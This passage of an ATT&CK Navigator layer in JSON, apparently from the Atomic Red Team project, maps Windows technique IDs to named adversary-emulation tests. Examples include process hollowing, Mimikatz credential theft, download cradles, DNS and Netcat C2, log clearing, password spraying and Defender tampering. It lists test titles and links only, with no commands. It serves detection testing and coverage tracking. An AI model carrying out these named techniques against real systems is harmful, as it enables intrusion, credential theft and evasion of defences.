Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic 
script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- 
Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE 
Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- 
certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":4,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n- ESXi - Brute Force Until Account Lockout\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- 
Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - 
PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.001","score":1,"enabled":true,"comment":"\n- Injecting a Macro into the Word Normal.dotm 
Template for Persistence via PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password 